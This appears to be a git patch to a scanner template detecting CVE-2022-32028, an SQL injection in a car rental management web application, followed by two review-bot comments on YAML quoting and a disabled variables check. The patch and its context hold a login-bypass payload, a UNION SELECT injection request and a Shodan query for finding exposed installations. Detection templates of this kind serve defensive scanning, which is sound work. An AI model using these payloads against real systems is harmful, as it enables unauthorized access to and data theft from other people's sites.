From 079f21a07eae4568d6d579f62d171a32affbaa76 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 2 Aug 2022 14:47:04 +0530
Subject: [PATCH] Update CVE-2022-32028.yaml
---
 cves/2022/CVE-2022-32028.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-32028.yaml b/cves/2022/CVE-2022-32028.yaml
index b8f72a277a..3df3b33d91 100644
--- a/cves/2022/CVE-2022-32028.yaml
+++ b/cves/2022/CVE-2022-32028.yaml
@@ -12,6 +12,7 @@ info:
 metadata:
 verified: true
 shodan-query: http.html:"Car Rental Management System"
+ comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
 tags: cve,cve2022,carrental,cms,sqli,authenticated
 variables:
@@ -19,7 +20,6 @@ variables:
 requests:
 - raw:
-# Login bypass possible using a payload: admin'+or+'1'%3D'1' in username.
 - |
 POST /admin/ajax.php?action=login HTTP/1.1
 Host: {{Hostname}}
@@ -31,6 +31,7 @@ requests:
 GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1
 Host: {{Hostname}}
+ skip-variables-check: true
 redirects: true
 max-redirects: 2
 cookie-reuse: true
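Review bot: The new `comment:` value under `metadata` is an unquoted plain scalar that contains single quotes, `%` and a ` - ` sequence. It parses as written, but a later edit that introduces `: ` or ` #` into the sentence would silently truncate or break the field. Since the text has moved from a YAML comment into parsed data, I would wrap the whole value in double quotes, i.e. `comment: "<existing sentence unchanged>"`.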
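Review bot: `skip-variables-check: true` is added in the last hunk with nothing explaining which placeholder requires it. With the check disabled, a request that still contains an unresolved `{{...}}` marker is sent as-is instead of being skipped. A run missing an expected input would then likely show up as a quiet non-match rather than a visible error; given the `authenticated` tag the missing input is presumably the login credentials, but the POST body is outside the hunk. I would put a line above the flag such as `# skip-variables-check: <reason this template carries intentionally unresolved markers>`. It is also worth confirming that the matcher, which is not visible here, only fires on the MD5 of `{{num}}`.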